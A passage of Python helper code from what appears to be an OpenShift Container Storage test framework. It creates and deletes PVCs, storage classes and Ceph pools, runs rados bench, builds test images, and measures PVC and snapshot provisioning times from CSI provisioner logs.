templating.dump_data_to_temp_yaml(pvc_data, f"{tmpdir}/{name}.yaml")
ocs_objs.append(pvc.PVC(**pvc_data))
logger.info("Creating all PVCs as bulk")
oc = OCP(kind="pod", namespace=namespace)
cmd = f"create -f {tmpdir}/"
oc.exec_oc_cmd(command=cmd, out_yaml_format=False)
# Letting the system 1 sec for each PVC to create.
# this will prevent any other command from running in the system in this
# period of time.
logger.info(
f"Going to sleep for {number_of_pvc} sec. "
"until starting verify that PVCs was created."
)
time.sleep(number_of_pvc)
return ocs_objs, tmpdir
def delete_bulk_pvcs(pvc_yaml_dir, pv_names_list):
"""
Deletes all the pvcs created from yaml file in a provided dir
Args:
pvc_yaml_dir (str): Directory in which yaml file resides
pv_names_list (str): List of pv objects to be deleted
"""
oc = OCP(kind="pod", namespace=defaults.ROOK_CLUSTER_NAMESPACE)
cmd = f"delete -f {pvc_yaml_dir}/"
oc.exec_oc_cmd(command=cmd, out_yaml_format=False)
time.sleep(len(pv_names_list) / 2)
for pv_name in pv_names_list:
validate_pv_delete(pv_name)
def verify_block_pool_exists(pool_name):
"""
Verify if a Ceph block pool exist
Args:
pool_name (str): The name of the Ceph block pool
Returns:
bool: True if the Ceph block pool exists, False otherwise
"""
logger.info(f"Verifying that block pool {pool_name} exists")
ct_pod = pod.get_ceph_tools_pod()
try:
for pools in TimeoutSampler(60, 3, ct_pod.exec_ceph_cmd, "ceph osd lspools"):
logger.info(f"POOLS are {pools}")
for pool in pools:
if pool_name in pool.get("poolname"):
return True
except TimeoutExpiredError:
return False
def get_pool_cr(pool_name):
"""
Get the pool CR even if the kind is unknown.
Args:
pool_name (str): The name of the pool to get the CR for.
Returns:
dict: If the resource is found, None otherwise.
"""
logger.info(f"Checking if pool {pool_name} is kind of {constants.CEPHBLOCKPOOL}")
ocp_kind_cephblockpool = ocp.OCP(
kind=constants.CEPHBLOCKPOOL, namespace=config.ENV_DATA["cluster_namespace"]
)
pool_cr = ocp_kind_cephblockpool.get(resource_name=pool_name, dont_raise=True)
if pool_cr is not None:
return pool_cr
else:
logger.info(
f"Pool {pool_name} is not kind={constants.CEPHBLOCKPOOL}"
f", checkging if it is kind={constants.CEPHFILESYSTEM}"
)
ocp_kind_cephfilesystem = ocp.OCP(
kind="CephFilesystem",
namespace=config.ENV_DATA["cluster_namespace"],
)
pool_cr = ocp_kind_cephfilesystem.get(resource_name=pool_name, dont_raise=True)
return pool_cr
def get_admin_key():
"""
Fetches admin key secret from Ceph
Returns:
str: The admin key
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd("ceph auth get-key client.admin")
return out["key"]
def get_cephfs_data_pool_name():
"""
Fetches ceph fs datapool name from Ceph
Returns:
str: fs datapool name
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd("ceph fs ls")
return out[0]["data_pools"][0]
def validate_cephfilesystem(fs_name):
"""
Verify CephFileSystem exists at Ceph and OCP
Args:
fs_name (str): The name of the Ceph FileSystem
Returns:
bool: True if CephFileSystem is created at Ceph and OCP side else
will return False with valid msg i.e Failure cause
"""
cfs = ocp.OCP(
kind=constants.CEPHFILESYSTEM, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
ct_pod = pod.get_ceph_tools_pod()
ceph_validate = False
ocp_validate = False
result = cfs.get(resource_name=fs_name)
if result.get("metadata").get("name"):
logger.info("Filesystem %s got created from Openshift Side", fs_name)
ocp_validate = True
else:
logger.info("Filesystem %s was not create at Openshift Side", fs_name)
return False
try:
for pools in TimeoutSampler(60, 3, ct_pod.exec_ceph_cmd, "ceph fs ls"):
for out in pools:
result = out.get("name")
if result == fs_name:
logger.info("FileSystem %s got created from Ceph Side", fs_name)
ceph_validate = True
break
else:
logger.error("FileSystem %s was not present at Ceph Side", fs_name)
ceph_validate = False
if ceph_validate:
break
except TimeoutExpiredError:
pass
return True if (ceph_validate and ocp_validate) else False
def create_ocs_object_from_kind_and_name(
kind, resource_name, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
):
"""
Create OCS object from kind and name
Args:
kind (str): resource kind like CephBlockPool, pvc.
resource_name (str): name of the resource.
namespace (str) the namespace of the resource.
Returns:
ocs_ci.ocs.resources.ocs.OCS (obj): returns OCS object from kind and name.
"""
ocp_object = OCP(kind=kind, resource_name=resource_name, namespace=namespace).get()
return OCS(**ocp_object)
def remove_ocs_object_from_list(kind, resource_name, object_list):
"""
Given a list of OCS objects, the function removes the object with kind and resource from the list
Args:
kind (str): resource kind like CephBlockPool, pvc.
resource_name (str): name of the resource.
object_list (array): Array of OCS objects.
Returns:
(array): Array of OCS objects without removed object.
"""
for obj in object_list:
if obj.name == resource_name and obj.kind == kind:
object_list.remove(obj)
return object_list
def get_all_storageclass_names():
"""
Function for getting all storageclass
Returns:
list: list of storageclass name
"""
sc_obj = ocp.OCP(
kind=constants.STORAGECLASS, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = sc_obj.get()
sample = result["items"]
storageclass = [
item.get("metadata").get("name")
for item in sample
if (
(item.get("metadata").get("name") not in constants.IGNORE_SC_GP2)
and (item.get("metadata").get("name") not in constants.IGNORE_SC_FLEX)
)
]
return storageclass
def delete_storageclasses(sc_objs):
""" "
Function for Deleting storageclasses
Args:
sc_objs (list): List of SC objects for deletion
Returns:
bool: True if deletion is successful
"""
for sc in sc_objs:
logger.info("Deleting StorageClass with name %s", sc.name)
sc.delete()
return True
def get_cephblockpool_names():
"""
Function for getting all CephBlockPool
Returns:
list: list of cephblockpool name
"""
pool_obj = ocp.OCP(
kind=constants.CEPHBLOCKPOOL, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = pool_obj.get()
sample = result["items"]
pool_list = [item.get("metadata").get("name") for item in sample]
return pool_list
def delete_cephblockpools(cbp_objs):
"""
Function for deleting CephBlockPool
Args:
cbp_objs (list): List of CBP objects for deletion
Returns:
bool: True if deletion of CephBlockPool is successful
"""
for cbp in cbp_objs:
logger.info("Deleting CephBlockPool with name %s", cbp.name)
cbp.delete()
return True
def get_cephfs_name():
"""
Function to retrive CephFS name
Returns:
str: Name of CFS
"""
ct_pod = pod.get_ceph_tools_pod()
result = ct_pod.exec_ceph_cmd("ceph fs ls")
return result[0]["name"]
def pull_images(image_name):
"""
Function to pull images on all nodes
Args:
image_name (str): Name of the container image to be pulled
Returns: None
"""
node_objs = node.get_node_objs(node.get_worker_nodes())
for node_obj in node_objs:
logging.info(f'pulling image "{image_name} " on node {node_obj.name}')
assert node_obj.ocp.exec_oc_debug_cmd(
node_obj.name, cmd_list=[f"podman pull {image_name}"]
)
def run_io_with_rados_bench(**kw):
"""
A task for radosbench. Runs radosbench command on specified pod . If
parameters are not provided task assumes few default parameters.This task
runs command in synchronous fashion.
Args:
kw (dict): a dictionary of various radosbench parameters.
ex::
pool_name:pool
pg_num:number of pgs for pool
op: type of operation {read, write}
cleanup: True OR False
Returns:
ret: return value of radosbench command
"""
logger.info("Running radosbench task")
ceph_pods = kw.get("ceph_pods") # list of pod objects of ceph cluster
config = kw.get("config")
role = config.get("role", "client")
clients = [cpod for cpod in ceph_pods if role in cpod.roles]
idx = config.get("idx", 0)
client = clients[idx]
op = config.get("op", "write")
cleanup = ["--no-cleanup", "--cleanup"][config.get("cleanup", True)]
pool = config.get("pool")
block = str(config.get("size", 4 << 20))
time = config.get("time", 120)
time = str(time)
rados_bench = (
f"rados --no-log-to-stderr "
f"-b {block} "
f"-p {pool} "
f"bench "
f"{time} "
f"{op} "
f"{cleanup} "
)
try:
ret = client.exec_ceph_cmd(ceph_cmd=rados_bench)
except CommandFailed as ex:
logger.error(f"Rados bench failed\n Error is: {ex}")
return False
logger.info(ret)
logger.info("Finished radosbench")
return ret
def get_all_pvs():
"""
Gets all pv in openshift-storage namespace
Returns:
dict: Dict of all pv in openshift-storage namespace
"""
ocp_pv_obj = ocp.OCP(kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
return ocp_pv_obj.get()
# TODO: revert counts of tries and delay,BZ 1726266
@retry(AssertionError, tries=20, delay=10, backoff=1)
def validate_pv_delete(pv_name):
"""
validates if pv is deleted after pvc deletion
Args:
pv_name (str): pv from pvc to validates
Returns:
bool: True if deletion is successful
Raises:
AssertionError: If pv is not deleted
"""
ocp_pv_obj = ocp.OCP(kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
try:
if ocp_pv_obj.get(resource_name=pv_name):
msg = f"{constants.PV} {pv_name} is not deleted after PVC deletion"
raise AssertionError(msg)
except CommandFailed:
return True
def create_pods(
pvc_objs, pod_factory, interface, pods_for_rwx=1, status="", nodes=None
):
"""
Create pods
Args:
pvc_objs (list): List of ocs_ci.ocs.resources.pvc.PVC instances
pod_factory (function): pod_factory function
interface (int): Interface type
pods_for_rwx (int): Number of pods to be created if access mode of
PVC is RWX
status (str): If provided, wait for desired state of each pod before
creating next one
nodes (list): Node name for each pod will be selected from this list.
Returns:
list: list of Pod objects
"""
pod_objs = []
nodes_iter = cycle(nodes) if nodes else None
for pvc_obj in pvc_objs:
volume_mode = getattr(
pvc_obj, "volume_mode", pvc_obj.get()["spec"]["volumeMode"]
)
access_mode = getattr(pvc_obj, "access_mode", pvc_obj.get_pvc_access_mode)
if volume_mode == "Block":
pod_dict = constants.CSI_RBD_RAW_BLOCK_POD_YAML
raw_block_pv = True
else:
raw_block_pv = False
pod_dict = ""
if access_mode == constants.ACCESS_MODE_RWX:
pod_obj_rwx = [
pod_factory(
interface=interface,
pvc=pvc_obj,
status=status,
node_name=next(nodes_iter) if nodes_iter else None,
pod_dict_path=pod_dict,
raw_block_pv=raw_block_pv,
)
for _ in range(1, pods_for_rwx)
]
pod_objs.extend(pod_obj_rwx)
pod_obj = pod_factory(
interface=interface,
pvc=pvc_obj,
status=status,
node_name=next(nodes_iter) if nodes_iter else None,
pod_dict_path=pod_dict,
raw_block_pv=raw_block_pv,
)
pod_objs.append(pod_obj)
return pod_objs
def create_build_from_docker_image(
image_name,
install_package,
namespace,
source_image="quay.io/ocsci/fedora",
source_image_label="latest",
):
"""
Allows to create a build config using a Dockerfile specified as an
argument, eg.::
$ oc new-build -D $'FROM centos:7\\nRUN yum install -y httpd'
creates a build with ``httpd`` installed.
Args:
image_name (str): Name of the image to be created
source_image (str): Source image to build docker image from,
defaults to Centos as base image
namespace (str): project where build config should be created
source_image_label (str): Tag to use along with the image name,
defaults to 'latest'
install_package (str): package to install over the base image
Returns:
ocs_ci.ocs.ocp.OCP (obj): The OCP object for the image
Fails on UnavailableBuildException exception if build creation
fails
"""
base_image = source_image + ":" + source_image_label
if config.DEPLOYMENT.get("disconnected"):
base_image = mirror_image(image=base_image)
cmd = f"yum install -y {install_package}"
http_proxy, https_proxy, no_proxy = get_cluster_proxies()
if http_proxy:
cmd = (
f"http_proxy={http_proxy} https_proxy={https_proxy} "
f"no_proxy='{no_proxy}' {cmd}"
)
docker_file = f"FROM {base_image}\n " f" RUN {cmd}\n" f"CMD tail -f /dev/null"
command = f"new-build -D $'{docker_file}' --name={image_name}"
kubeconfig = os.getenv("KUBECONFIG")
oc_cmd = f"oc -n {namespace} "
if kubeconfig:
oc_cmd += f"--kubeconfig {kubeconfig} "
oc_cmd += command
logger.info(f"Running command {oc_cmd}")
result = run(oc_cmd, stdout=PIPE, stderr=PIPE, timeout=15, shell=True)
if result.stderr.decode():
raise UnavailableBuildException(
f"Build creation failed with error: {result.stderr.decode()}"
)
out = result.stdout.decode()
logger.info(out)
if "Success" in out:
# Build becomes ready once build pod goes into Completed state
pod_obj = OCP(kind="Pod", resource_name=image_name)
if pod_obj.wait_for_resource(
condition="Completed",
resource_name=f"{image_name}" + "-1-build",
timeout=300,
sleep=30,
):
logger.info(f"build {image_name} ready")
set_image_lookup(image_name)
logger.info(f"image {image_name} can now be consumed")
image_stream_obj = OCP(kind="ImageStream", resource_name=image_name)
return image_stream_obj
else:
raise UnavailableBuildException("Build creation failed")
def set_image_lookup(image_name):
"""
Function to enable lookup, which allows reference to the image stream tag
in the image field of the object. Example::
$ oc set image-lookup mysql
$ oc run mysql --image=mysql
Args:
image_name (str): Name of the image stream to pull
the image locally
Returns:
str: output of set image-lookup command
"""
ocp_obj = ocp.OCP(kind="ImageStream")
command = f"set image-lookup {image_name}"
logger.info(f'image lookup for image"{image_name}" is set')
status = ocp_obj.exec_oc_cmd(command)
return status
def get_snapshot_time(interface, snap_name, status):
"""
Get the starting/ending creation time of a PVC based on provisioner logs
The time and date extraction code below has been modified to read
the month and day data in the logs. This fixes an error where negative
time values are calculated when test runs cross midnight. Also, previous
calculations would not set the year, and so the calculations were done
as if the year were 1900. This is not a problem except that 1900 was
not a leap year and so the next February 29th would throw ValueErrors
for the whole day. To avoid this problem, changes were made to also
include the current year.
Incorrect times will still be given for tests that cross over from
December 31 to January 1.
Args:
interface (str): The interface backed the PVC
pvc_name (str / list): Name of the PVC(s) for creation time
the list will be list of pvc objects
status (str): the status that we want to get - Start / End
Returns:
datetime object: Time of PVC(s) creation
"""
def get_pattern_time(log, snapname, pattern):
"""
Get the time of pattern in the log
Args:
log (list): list of all lines in the log file
snapname (str): the name of the snapshot
pattern (str): the pattern that need to be found in the log (start / bound)
Returns:
str: string of the pattern timestamp in the log, if not found None
"""
this_year = str(datetime.datetime.now().year)
for line in log:
if re.search(snapname, line) and re.search(pattern, line):
mon_day = " ".join(line.split(" ")[0:2])
return f"{this_year} {mon_day}"
return None
logs = ""
# the starting and ending time are taken from different logs,
# the start creation time is taken from the snapshot controller, while
# the end creation time is taken from the csi snapshot driver
if status.lower() == "start":
pattern = "Creating content for snapshot"
# Get the snapshoter-controller pod
pod_name = pod.get_csi_snapshoter_pod()
logs = pod.get_pod_logs(
pod_name, namespace="openshift-cluster-storage-operator"
)
elif status.lower() == "end":
pattern = "readyToUse true"
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
for log_pod in pod_name:
logs += pod.get_pod_logs(log_pod, "csi-snapshotter")
else:
logger.error(f"the status {status} is invalid.")
return None
logs = logs.split("\n")
stat = None
# Extract the time for the one PVC snapshot provisioning
if isinstance(snap_name, str):
stat = get_pattern_time(logs, snap_name, pattern)
# Extract the time for the list of PVCs snapshot provisioning
if isinstance(snap_name, list):
all_stats = []
for snapname in snap_name:
all_stats.append(get_pattern_time(logs, snapname.name, pattern))
all_stats = sorted(all_stats)
if status.lower() == "end":
stat = all_stats[-1] # return the highest time
elif status.lower() == "start":
stat = all_stats[0] # return the lowest time
if stat:
return datetime.datetime.strptime(stat, DATE_TIME_FORMAT)
else:
return None
def measure_snapshot_creation_time(interface, snap_name, snap_con_name, snap_uid=None):
"""
Measure Snapshot creation time based on logs
Args:
snap_name (str): Name of the snapshot for creation time measurement
Returns:
float: Creation time for the snapshot
"""
start = get_snapshot_time(interface, snap_name, status="start")
end = get_snapshot_time(interface, snap_con_name, status="end")
logs = ""
if start and end:
total = end - start
return total.total_seconds()
else:
# at 4.8 the log messages was changed, so need different parsing
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
for log_pod in pod_name:
logger.info(f"Read logs from {log_pod}")
logs += pod.get_pod_logs(log_pod, "csi-snapshotter")
logs = logs.split("\n")
pattern = "CSI CreateSnapshot: snapshot-"
for line in logs:
if (
re.search(snap_uid, line)
and re.search(pattern, line)
and re.search("readyToUse \\[true\\]", line)
):
# The creation time log is in nanosecond, so, it need to convert to seconds.
results = int(line.split()[-5].split(":")[1].replace("]", "")) * (
10 ** -9
)
return float(f"{results:.3f}")
return None
def get_provision_time(interface, pvc_name, status="start"):
"""
Get the starting/ending creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str / list): Name of the PVC(s) for creation time
the list will be list of pvc objects
status (str): the status that we want to get - Start / End
Returns:
datetime object: Time of PVC(s) creation
"""
# Define the status that need to retrieve
operation = "started"
if status.lower() == "end":
operation = "succeeded"
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the time for the one PVC provisioning
if isinstance(pvc_name, str):
stat = [i for i in logs if re.search(f"provision.*{pvc_name}.*{operation}", i)]
mon_day = " ".join(stat[0].split(" ")[0:2])
stat = f"{this_year} {mon_day}"
# Extract the time for the list of PVCs provisioning
if isinstance(pvc_name, list):
all_stats = []
for i in range(0, len(pvc_name)):
name = pvc_name[i].name
stat = [i for i in logs if re.search(f"provision.*{name}.*{operation}", i)]
mon_day = " ".join(stat[0].split(" ")[0:2])
stat = f"{this_year} {mon_day}"
all_stats.append(stat)
all_stats = sorted(all_stats)
if status.lower() == "end":
stat = all_stats[-1] # return the highest time
elif status.lower() == "start":
stat = all_stats[0] # return the lowest time
return datetime.datetime.strptime(stat, DATE_TIME_FORMAT)
def get_start_creation_time(interface, pvc_name):
"""
Get the starting creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: Start time of PVC creation
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the starting time for the PVC provisioning
start = [i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start = f"{this_year} {mon_day}"
return datetime.datetime.strptime(start, DATE_TIME_FORMAT)
def get_end_creation_time(interface, pvc_name):
"""
Get the ending creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: End time of PVC creation
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the starting time for the PVC provisioning
end = [i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)]
# End provisioning string may appear in logs several times, take here the latest one
mon_day = " ".join(end[-1].split(" ")[0:2])
end = f"{this_year} {mon_day}"
return datetime.datetime.strptime(end, DATE_TIME_FORMAT)
def measure_pvc_creation_time(interface, pvc_name):
"""
Measure PVC creation time based on logs
Args:
interface (str): The interface backed the PVC pvc_name (str): Name of the PVC for creation time measurement
Returns:
float: Creation time for the PVC
"""
start = get_start_creation_time(interface=interface, pvc_name=pvc_name)
end = get_end_creation_time(interface=interface, pvc_name=pvc_name)
total = end - start
return total.total_seconds()
def measure_pvc_creation_time_bulk(interface, pvc_name_list, wait_time=60):
"""
Measure PVC creation time of bulk PVC based on logs.
Args:
interface (str): The interface backed the PVC
pvc_name_list (list): List of PVC Names for measuring creation time
wait_time (int): Seconds to wait before collecting CSI log
Returns:
pvc_dict (dict): Dictionary of pvc_name with creation time.
"""
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# due to some delay in CSI log generation added wait
time.sleep(wait_time)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter = 0
while True:
no_data_list = list()
for name in pvc_name_list:
# check if PV data present in CSI logs
start = [i for i in logs if re.search(f"provision.*{name}.*started", i)]
end = [i for i in logs if re.search(f"provision.*{name}.*succeeded", i)]
if not start or not end:
no_data_list.append(name)
if no_data_list:
# Clear and get CSI logs after 60secs
logging.info(f"PVC count without CSI create log data {len(no_data_list)}")
logs.clear()
time.sleep(wait_time)
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter += 1
if loop_counter >= 6:
logging.info("Waited for more than 6mins still no data")
raise UnexpectedBehaviour(
f"There is no pvc creation data in CSI logs for {no_data_list}"
)
continue
else:
break
pvc_dict = dict()
this_year = str(datetime.datetime.now().year)
for pvc_name in pvc_name_list:
# Extract the starting time for the PVC provisioning
start = [i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start = f"{this_year} {mon_day}"
start_time = datetime.datetime.strptime(start, DATE_TIME_FORMAT)
# Extract the end time for the PVC provisioning
end = [i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)]
mon_day = " ".join(end[0].split(" ")[0:2])
end = f"{this_year} {mon_day}"
end_time = datetime.datetime.strptime(end, DATE_TIME_FORMAT)
total = end_time - start_time
pvc_dict[pvc_name] = total.total_seconds()
return pvc_dict
def measure_pv_deletion_time_bulk(
interface, pv_name_list, wait_time=60, return_log_times=False
):
"""
Measure PV deletion time of bulk PV, based on logs.
Args:
interface (str): The interface backed the PV
pv_name_list (list): List of PV Names for measuring deletion time
wait_time (int): Seconds to wait before collecting CSI log
return_log_times (bool): Determines the return value -- if False, dictionary of pv_names with the deletion time
is returned; if True -- the dictionary of pv_names with the tuple of (srart_deletion_time,
end_deletion_time) is returned
Returns:
pv_dict (dict): Dictionary where the pv_names are the keys. The value of the dictionary depend on the
return_log_times argument value and are either the corresponding deletion times (when return_log_times
is False) or a tuple of (start_deletion_time, end_deletion_time) as they appear in the logs
"""
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# due to some delay in CSI log generation added wait
time.sleep(wait_time)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter = 0
while True:
no_data_list = list()
for pv in pv_name_list:
# check if PV data present in CSI logs
start = [i for i in logs if re.search(f'delete "{pv}": started', i)]
end = [i for i in logs if re.search(f'delete "{pv}": succeeded', i)]
if not start or not end:
no_data_list.append(pv)
if no_data_list:
# Clear and get CSI logs after 60secs
logging.info(f"PV count without CSI delete log data {len(no_data_list)}")
logs.clear()
time.sleep(wait_time)
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter += 1
if loop_counter >= 6:
logging.info("Waited for more than 6mins still no data")
raise UnexpectedBehaviour(
f"There is no pv deletion data in CSI logs for {no_data_list}"
)
continue
else:
break
pv_dict = dict()
this_year = str(datetime.datetime.now().year)
for pv_name in pv_name_list:
# Extract the deletion start time for the PV
start = [i for i in logs if re.search(f'delete "{pv_name}": started', i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start_tm = f"{this_year} {mon_day}"
start_time = datetime.datetime.strptime(start_tm, DATE_TIME_FORMAT)
# Extract the deletion end time for the PV
end = [i for i in logs if re.search(f'delete "{pv_name}": succeeded', i)]
mon_day = " ".join(end[0].split(" ")[0:2])
end_tm = f"{this_year} {mon_day}"
end_time = datetime.datetime.strptime(end_tm, DATE_TIME_FORMAT)
total = end_time - start_time
if not return_log_times:
pv_dict[pv_name] = total.total_seconds()
else:
pv_dict[pv_name] = (start_tm, end_tm)
return pv_dict
def get_start_deletion_time(interface, pv_name):
"""
Get the starting deletion time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for deletion time measurement
Returns:
datetime object: Start time of PVC deletion
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the starting time for the PVC deletion
start = [i for i in logs if re.search(f'delete "{pv_name}": started', i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start = f"{this_year} {mon_day}"
return datetime.datetime.strptime(start, DATE_TIME_FORMAT)
def get_end_deletion_time(interface, pv_name):
"""
Get the ending deletion time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pv_name (str): Name of the PVC for deletion time measurement
Returns:
datetime object: End time of PVC deletion
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the starting time for the PV deletion
end = [i for i in logs if re.search(f'delete "{pv_name}": succeeded', i)]
mon_day = " ".join(end[0].split(" ")[0:2])
end = f"{this_year} {mon_day}"
return datetime.datetime.strptime(end, DATE_TIME_FORMAT)
def measure_pvc_deletion_time(interface, pv_name):
"""
Measure PVC deletion time based on logs
Args:
interface (str): The interface backed the PVC
pv_name (str): Name of the PV for creation time measurement
Returns:
float: Deletion time for the PVC
"""
start = get_start_deletion_time(interface=interface, pv_name=pv_name)
end = get_end_deletion_time(interface=interface, pv_name=pv_name)
total = end - start
return total.total_seconds()
def pod_start_time(pod_obj):
"""
Function to measure time taken for container(s) to get into running state
by measuring the difference between container's start time (when container
went into running state) and started time (when container was actually
started)
Args:
pod_obj(obj): pod object to measure start time
Returns:
containers_start_time(dict):
Returns the name and start time of container(s) in a pod
"""
time_format = "%Y-%m-%dT%H:%M:%SZ"
containers_start_time = {}
start_time = pod_obj.data["status"]["startTime"]
start_time = datetime.datetime.strptime(start_time, time_format)
for container in range(len(pod_obj.data["status"]["containerStatuses"])):
started_time = pod_obj.data["status"]["containerStatuses"][container]["state"][
"running"
]["startedAt"]
started_time = datetime.datetime.strptime(started_time, time_format)
container_name = pod_obj.data["status"]["containerStatuses"][container]["name"]
container_start_time = (started_time - start_time).seconds
containers_start_time[container_name] = container_start_time
return containers_start_time
def get_default_storage_class():
"""
Get the default StorageClass(es)
Returns:
list: default StorageClass(es) list
"""
default_sc_obj = ocp.OCP(kind="StorageClass")
storage_classes = default_sc_obj.get().get("items")
storage_classes = [
sc for sc in storage_classes if "annotations" in sc.get("metadata")
]
return [
sc.get("metadata").get("name")
for sc in storage_classes
if sc.get("metadata")
.get("annotations")
.get("storageclass.kubernetes.io/is-default-class")
== "true"
]
def change_default_storageclass(scname):
"""
Change the default StorageClass to the given SC name
Args:
scname (str): StorageClass name
Returns:
bool: True on success
"""
default_sc = get_default_storage_class()
ocp_obj = ocp.OCP(kind="StorageClass")
if default_sc:
# Change the existing default Storageclass annotation to false
for sc in default_sc:
patch = (
' \'{"metadata": {"annotations":'
'{"storageclass.kubernetes.io/is-default-class"'
':"false"}}}\' '
)
patch_cmd = f"patch storageclass {sc} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
# Change the new storageclass to default
patch = (
' \'{"metadata": {"annotations":'
'{"storageclass.kubernetes.io/is-default-class"'
':"true"}}}\' '
)
patch_cmd = f"patch storageclass {scname} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
return True
def is_volume_present_in_backend(interface, image_uuid, pool_name=None):
"""
Check whether Image/Subvolume is present in the backend.
Args:
interface (str): The interface backed the PVC
image_uuid (str): Part of VolID which represents corresponding
image/subvolume in backend, eg:
``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
Output is the CSI generated VolID and looks like:
``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
pool_name (str): Name of the rbd-pool if interface is CephBlockPool
Returns:
bool: True if volume is present and False if volume is not present
"""
cmd = ""
valid_error = []
ct_pod = pod.get_ceph_tools_pod()
if interface == constants.CEPHBLOCKPOOL:
valid_error = [f"error opening image csi-vol-{image_uuid}"]
cmd = f"rbd info -p {pool_name} csi-vol-{image_uuid}"
if interface == constants.CEPHFILESYSTEM:
valid_error = [
f"Subvolume 'csi-vol-{image_uuid}' not found",
f"subvolume 'csi-vol-{image_uuid}' does not exist",
]
cmd = (
f"ceph fs subvolume getpath {get_cephfs_name()}"
f" csi-vol-{image_uuid} csi"
)
try:
ct_pod.exec_ceph_cmd(ceph_cmd=cmd, format="json")
logger.info(
f"Verified: Volume corresponding to uuid {image_uuid} exists " f"in backend"
)
return True
except CommandFailed as ecf:
assert any([error in str(ecf) for error in valid_error]), (
f"Error occurred while verifying volume is present in backend: "
f"{str(ecf)} ImageUUID: {image_uuid}. Interface type: {interface}"
)
logger.info(
f"Volume corresponding to uuid {image_uuid} does not exist " f"in backend"
)
return False
def verify_volume_deleted_in_backend(
interface, image_uuid, pool_name=None, timeout=180
):
"""
Ensure that Image/Subvolume is deleted in the backend.
Args:
interface (str): The interface backed the PVC
image_uuid (str): Part of VolID which represents corresponding
image/subvolume in backend, eg:
``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
Output is the CSI generated VolID and looks like:
``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
pool_name (str): Name of the rbd-pool if interface is CephBlockPool
timeout (int): Wait time for the volume to be deleted.
Returns:
bool: True if volume is deleted before timeout.
False if volume is not deleted.
"""
try:
for ret in TimeoutSampler(
timeout,
2,
is_volume_present_in_backend,
interface=interface,
image_uuid=image_uuid,
pool_name=pool_name,
):
if not ret:
break
logger.info(
